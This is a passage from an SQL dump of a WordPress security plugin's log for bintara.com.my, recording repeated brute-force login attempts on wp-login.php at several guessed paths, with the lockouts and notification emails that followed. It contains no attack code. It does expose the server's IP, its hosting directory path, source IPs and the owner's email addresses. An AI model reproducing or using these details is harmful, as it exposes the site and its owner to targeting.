Z\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBeXkXpgmG5P@iB8kN-AAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063289.6855\";s:12:\"REQUEST_TIME\";s:10:\"1569063289\";}}','notice','2019-09-21 10:54:50','2019-09-21 10:54:50',17797504,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25376,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBbnkXpgmG5P@iB8kN7AAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"155.4.96.83\";s:11:\"REMOTE_PORT\";s:5:\"58774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBbnkXpgmG5P@iB8kN7AAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063278.6638\";s:12:\"REQUEST_TIME\";s:10:\"1569063278\";}}','notice','2019-09-21 10:54:40','2019-09-21 10:54:39',17800664,19291224,'https://bintara.com.my/blog/wp-login.php',1,0,'155.4.96.83'),(25374,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:54:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:54:23\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:09:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:09:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:54:24','2019-09-21 10:54:23',17884040,19289168,'https://bintara.com.my/2019/wp-login.php',1,0,'192.187.116.130'),(25375,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:54:24','2019-09-21 10:54:23',18090592,19289168,'https://bintara.com.my/2019/wp-login.php',1,0,'192.187.116.130'),(25371,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:53:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:53:22\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:08:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:08:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:53:23','2019-09-21 10:53:22',17883608,19289384,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(25372,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:53:23','2019-09-21 10:53:22',18089792,19289384,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(25373,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBXrfBTP0kPOVnb8jpWgAAAFY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"192.187.116.130\";s:11:\"REMOTE_PORT\";s:5:\"55020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBXrfBTP0kPOVnb8jpWgAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063262.7608\";s:12:\"REQUEST_TIME\";s:10:\"1569063262\";}}','notice','2019-09-21 10:54:24','2019-09-21 10:54:23',17799288,19289168,'https://bintara.com.my/2019/wp-login.php',1,0,'192.187.116.130'),(25369,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:53:08','2019-09-21 10:53:07',18088736,19289856,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.15.226.60'),(25370,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBIliJ7D9Gn7wDPh8VBQAAAM0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"46926\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBIliJ7D9Gn7wDPh8VBQAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063202.4079\";s:12:\"REQUEST_TIME\";s:10:\"1569063202\";}}','notice','2019-09-21 10:53:23','2019-09-21 10:53:22',17798736,19289384,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(25368,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:53:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:53:07\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:08:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:08:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:53:08','2019-09-21 10:53:07',17882560,19289856,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.15.226.60'),(25365,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:52:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:52:45\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:07:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:07:45\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:52:47','2019-09-21 10:52:45',17877720,19283736,'https://bintara.com.my/wp/wp-login.php',1,0,'207.38.86.146'),(25366,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:52:47','2019-09-21 10:52:45',18083264,19283736,'https://bintara.com.my/wp/wp-login.php',1,0,'207.38.86.146'),(25367,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBE1iJ7D9Gn7wDPh8U@QAAANA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.60\";s:11:\"REMOTE_PORT\";s:5:\"48310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBE1iJ7D9Gn7wDPh8U@QAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063187.3381\";s:12:\"REQUEST_TIME\";s:10:\"1569063187\";}}','notice','2019-09-21 10:53:08','2019-09-21 10:53:07',17797704,19289856,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.15.226.60'),(25362,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:52:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:52:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:07:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:07:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:52:20','2019-09-21 10:52:19',17884408,19289168,'https://bintara.com.my/test/wp-login.php',1,0,'134.209.5.43'),(25363,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:52:20','2019-09-21 10:52:19',18090064,19289168,'https://bintara.com.my/test/wp-login.php',1,0,'134.209.5.43'),(25364,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYA-ViJ7D9Gn7wDPh8U9gAAAMs\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"207.38.86.146\";s:11:\"REMOTE_PORT\";s:5:\"47666\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYA-ViJ7D9Gn7wDPh8U9gAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063165.3824\";s:12:\"REQUEST_TIME\";s:10:\"1569063165\";}}','notice','2019-09-21 10:52:47','2019-09-21 10:52:45',17793000,19283736,'https://bintara.com.my/wp/wp-login.php',1,0,'207.38.86.146'),(25359,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:52:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:52:10\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:07:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:07:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:52:11','2019-09-21 10:52:10',17883944,19289728,'https://bintara.com.my/2019/wp-login.php',1,0,'45.252.248.161'),(25360,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:52:11','2019-09-21 10:52:10',18089864,19289728,'https://bintara.com.my/2019/wp-login.php',1,0,'45.252.248.161'),(25361,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 